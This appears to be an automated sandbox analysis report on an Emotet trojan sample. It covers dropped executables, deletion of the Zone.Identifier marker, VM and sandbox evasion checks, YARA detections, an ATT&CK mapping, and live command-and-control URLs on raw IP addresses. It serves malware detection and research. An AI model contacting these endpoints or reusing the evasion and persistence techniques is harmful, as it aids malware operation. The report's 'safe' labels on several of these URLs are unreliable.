              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C78BE push ecx; mov dword ptr [esp], 0000C5A1h0_2_021C78BF
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C78EE push ecx; mov dword ptr [esp], 00006847h0_2_021C78EF
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C792E push ecx; mov dword ptr [esp], 0000B2E0h0_2_021C792F
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C795E push ecx; mov dword ptr [esp], 000089FAh0_2_021C795F
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C798E push ecx; mov dword ptr [esp], 0000AAF5h0_2_021C798F
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C79AE push ecx; mov dword ptr [esp], 0000F5B3h0_2_021C79AF
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0040F54B push ecx; ret 2_2_0040F55B
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0040E770 push eax; ret 2_2_0040E784
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0040E770 push eax; ret 2_2_0040E7AC
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0040EA88 push eax; ret 2_2_0040EAA6
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02235E10 push ecx; mov dword ptr [esp], 0000F5B3h2_2_02235E11

              Persistence and Installation Behavior

              barindex
              Drops executables to the windows directory (C:\Windows) and starts them
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeExecutable created and started: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeExecutable created and started: C:\Windows\SysWOW64\rtmpal\dfscli.exeJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exePE file moved: C:\Windows\SysWOW64\rtmpal\dfscli.exeJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Hides that the sample has been downloaded from the Internet (zone.identifier)
              Source: C:\Users\user\Desktop\ExeFile (233).exeFile opened: C:\Windows\SysWOW64\rtmpal\dfscli.exe:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeFile opened: C:\Windows\SysWOW64\KBDTZM\mibincodec.exe:Zone.Identifier read attributes | deleteJump to behavior
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 7080
              Source: unknownNetwork traffic detected: HTTP traffic on port 7080 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 7080
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00405138 IsIconic,GetWindowPlacement,GetWindowRect,0_2_00405138
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00403550 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_00403550
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_00405138 IsIconic,GetWindowPlacement,GetWindowRect,2_2_00405138
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_00403550 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,2_2_00403550
              Source: C:\Users\user\Desktop\ExeFile (233).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-36653
              Source: C:\Users\user\Desktop\ExeFile (233).exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-36575
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,0_2_02265070
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,2_2_02235070
              Source: C:\Users\user\Desktop\ExeFile (233).exeAPI coverage: 5.7 %
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeAPI coverage: 5.7 %
              Source: C:\Users\user\Desktop\ExeFile (233).exe TID: 2948Thread sleep time: -60000s >= -30000sJump to behavior
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\ExeFile (233).exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00424A99 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_00424A99
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_022638F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,0_2_022638F0
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_00424A99 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,2_2_00424A99
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,2_2_022338F0
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,3_2_021F38F0
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_0040E573 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_0040E573
              Source: mibincodec.exe, 00000003.00000002.3346168419.0000000000690000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: mibincodec.exe, 00000003.00000002.3347478744.0000000002562000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
              Source: ExeFile (233).exe, 00000000.00000002.2114163895.0000000002914000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56s
              Source: C:\Users\user\Desktop\ExeFile (233).exeAPI call chain: ExitProcess graph end nodegraph_0-36746
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeAPI call chain: ExitProcess graph end nodegraph_2-36748
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeAPI call chain: ExitProcess graph end nodegraph_3-12453
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00402530 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,0_2_00402530
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00402530 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,0_2_00402530
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02264E20 mov eax, dword ptr fs:[00000030h]0_2_02264E20
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_02263F20 mov eax, dword ptr fs:[00000030h]0_2_02263F20
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C5ABE mov eax, dword ptr fs:[00000030h]0_2_021C5ABE
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C095E mov eax, dword ptr fs:[00000030h]0_2_021C095E
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C69BE mov eax, dword ptr fs:[00000030h]0_2_021C69BE
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021C0456 mov eax, dword ptr fs:[00000030h]0_2_021C0456
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_021F1030 mov eax, dword ptr fs:[00000030h]0_2_021F1030
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02234E20 mov eax, dword ptr fs:[00000030h]2_2_02234E20
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02233F20 mov eax, dword ptr fs:[00000030h]2_2_02233F20
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02195ABE mov eax, dword ptr fs:[00000030h]2_2_02195ABE
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0219095E mov eax, dword ptr fs:[00000030h]2_2_0219095E
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_021969BE mov eax, dword ptr fs:[00000030h]2_2_021969BE
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_02190456 mov eax, dword ptr fs:[00000030h]2_2_02190456
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_021C1030 mov eax, dword ptr fs:[00000030h]2_2_021C1030
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F3F20 mov eax, dword ptr fs:[00000030h]3_2_021F3F20
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021F4E20 mov eax, dword ptr fs:[00000030h]3_2_021F4E20
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_02180456 mov eax, dword ptr fs:[00000030h]3_2_02180456
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_02185ABE mov eax, dword ptr fs:[00000030h]3_2_02185ABE
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_0218095E mov eax, dword ptr fs:[00000030h]3_2_0218095E
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021869BE mov eax, dword ptr fs:[00000030h]3_2_021869BE
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeCode function: 3_2_021B1030 mov eax, dword ptr fs:[00000030h]3_2_021B1030
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_022642F0 GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,0_2_022642F0
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_0041214A SetUnhandledExceptionFilter,0_2_0041214A
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_0041215E SetUnhandledExceptionFilter,0_2_0041215E
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0041214A SetUnhandledExceptionFilter,2_2_0041214A
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0041215E SetUnhandledExceptionFilter,2_2_0041215E
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_00403110
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,0_2_0041B2C3
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: GetLocaleInfoA,MultiByteToWideChar,0_2_0041B37F
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,0_2_0041B3F3
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: GetLocaleInfoW,WideCharToMultiByte,0_2_0041B4A6
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: GetLocaleInfoA,_strncpy,0_2_004186CD
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: GetLocaleInfoA,0_2_004176FA
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: _strlen,EnumSystemLocalesA,0_2_00418BEC
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: _strlen,_strlen,EnumSystemLocalesA,0_2_00418C23
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat,0_2_00418CFE
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: _strlen,EnumSystemLocalesA,0_2_00418CA9
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,0_2_00427F61
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,2_2_00403110
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,2_2_0041B2C3
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: GetLocaleInfoA,MultiByteToWideChar,2_2_0041B37F
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,2_2_0041B3F3
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: GetLocaleInfoW,WideCharToMultiByte,2_2_0041B4A6
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: GetLocaleInfoA,_strncpy,2_2_004186CD
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: GetLocaleInfoA,2_2_004176FA
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: _strlen,EnumSystemLocalesA,2_2_00418BEC
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: _strlen,_strlen,EnumSystemLocalesA,2_2_00418C23
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat,2_2_00418CFE
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: _strlen,EnumSystemLocalesA,2_2_00418CA9
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,2_2_00427F61
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00412E0F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00412E0F
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00414AE3 __lock,_strlen,_strcat,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy,0_2_00414AE3
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00403186 GetVersionExA,InterlockedExchange,0_2_00403186
              Source: C:\Windows\SysWOW64\KBDTZM\mibincodec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Emotet
              Source: Yara matchFile source: 2.2.dfscli.exe.219279e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.21c279e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.218279e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.218052e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.dfscli.exe.219052e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.218052e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.21c052e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.21c279e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.21c052e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.dfscli.exe.2230000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (233).exe.2260000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.dfscli.exe.219279e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.218279e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.mibincodec.exe.21f0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.dfscli.exe.219052e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.3346727228.00000000021B4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2117416875.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3346601105.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2113874721.00000000021F4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2117499906.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_0040422C bind,0_2_0040422C
              Source: C:\Users\user\Desktop\ExeFile (233).exeCode function: 0_2_00403600 SetTimer,listen,SetTimer,SetTimer,0_2_00403600
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_0040422C bind,2_2_0040422C
              Source: C:\Windows\SysWOW64\rtmpal\dfscli.exeCode function: 2_2_00403600 SetTimer,listen,SetTimer,SetTimer,2_2_00403600

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              Input Capture              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts11
              Service Execution              		12
              Windows Service              		12
              Windows Service              		2
              Obfuscated Files or Information              		LSASS Memory1
              System Service Discovery              		Remote Desktop Protocol1
              Input Capture              		22
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Process Injection              		1
              DLL Side-Loading              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin SharesData from Network Shared Drive11
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              File Deletion              		NTDS26
              System Information Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Masquerading              		LSA Secrets11
              Security Software Discovery              		SSHKeylogging113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Virtualization/Sandbox Evasion              		Cached Domain Credentials1
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Process Injection              		DCSync2
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Hidden Files and Directories              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              ExeFile (233).exe82%ReversingLabsWin32.Trojan.Emotet
              ExeFile (233).exe100%AviraHEUR/AGEN.1346053
              ExeFile (233).exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://74.214.230.200/LpKB18VG3Sv/wCjo7wyWELImd4sKB/XYJP/vAurLMRY4/JiSXcWi0E/bmhDcdvNb3/0%Avira URL Cloudsafe
              http://121.124.124.40:7080/gLDpms1fYdKy/0%Avira URL Cloudsafe
              http://121.124.124.40:7080/gLDpms1fYdKy/W0%Avira URL Cloudsafe
              http://121.124.124.40:7080/gLDpms1fYdKy/670%Avira URL Cloudsafe
              http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/D0%Avira URL Cloudsafe
              http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/O0%Avira URL Cloudsafe
              https://67.170.250.203:443/vE1qWiF8GUO/OKiMtdK9y/9BlkbfHs/KSvjvc1is4hq83x0Q/qTFsKaNJ2QVx5a/KqpZ4e/100%Avira URL Cloudmalware
              http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/b0%Avira URL Cloudsafe
              http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/40%Avira URL Cloudsafe
              http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/0%Avira URL Cloudsafe
              http://121.124.124.40:7080/gLDpms1fYdKy/E0jZ0%Avira URL Cloudsafe
              http://88.153.35.32/LqhsCyik6x/yDMw9sEc7al9N/WQVwtBBo/0%Avira URL Cloudsafe
              http://121.124.124.40:7080/gLDpms1fYdKy/biP8R7/XHAjzKH0LnedA/40%Avira URL Cloudsafe
              http://88.153.35.32/LqhsCyik6x/yDMw9sEc7al9N/WQVwtBBo/40%Avira URL Cloudsafe
              http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/?0%Avira URL Cloudsafe
              http://103.86.49.11:8080/9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/wsock.dll.mui0%Avira URL Cloudsafe
              http://103.86.49.11:8080/9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/40%Avira URL Cloudsafe
              http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/b0%Avira URL Cloudsafe
              http://74.214.230.200/LpKB18VG3Sv/wCjo7wyWELImd4sKB/XYJP/vAurLMRY4/JiSXcWi0E/bmhDcdvNb3/30%Avira URL Cloudsafe
              http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/0%Avira URL Cloudsafe
              http://173.212.214.235:7080/R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/p0%Avira URL Cloudsafe
              http://103.86.49.11:8080/9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/0%Avira URL Cloudsafe
              http://173.212.214.235:7080/R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/0%Avira URL Cloudsafe
              http://67.170.250.203:443/vE1qWiF8GUO/OKiMtdK9y/9BlkbfHs/KSvjvc1is4hq83x0Q/qTFsKaNJ2QVx5a/KqpZ4e/100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://67.170.250.203:443/vE1qWiF8GUO/OKiMtdK9y/9BlkbfHs/KSvjvc1is4hq83x0Q/qTFsKaNJ2QVx5a/KqpZ4e/true
              • Avira URL Cloud: malware
              		unknown
              http://74.214.230.200/LpKB18VG3Sv/wCjo7wyWELImd4sKB/XYJP/vAurLMRY4/JiSXcWi0E/bmhDcdvNb3/true
              • Avira URL Cloud: safe
              		unknown
              http://121.124.124.40:7080/gLDpms1fYdKy/true
              • Avira URL Cloud: safe
              		unknown
              http://88.153.35.32/LqhsCyik6x/yDMw9sEc7al9N/WQVwtBBo/true
              • Avira URL Cloud: safe
              		unknown
              http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/true
              • Avira URL Cloud: safe
              		unknown
              http://167.114.153.111:8080/IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/true
              • Avira URL Cloud: safe
              		unknown
              http://103.86.49.11:8080/9mmFlI8wqZPEO4Eye/1GdTSUCcmXtydSz7Jl/true
              • Avira URL Cloud: safe
              		unknown
              http://173.212.214.235:7080/R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/true
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/Dmibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://121.124.124.40:7080/gLDpms1fYdKy/67mibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://107.170.146.252:8080/59QulnlrGjN3xHL/Y0uv73jS/bmibincodec.exe, 00000003.00000003.2843423060.000000000258C000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000002.3347478744.0000000002588000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.2792139816.000000000258D000.00000004.00000020.00020000.00000000.sdmp, mibincodec.exe, 00000003.00000003.3332621995.000000000258C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
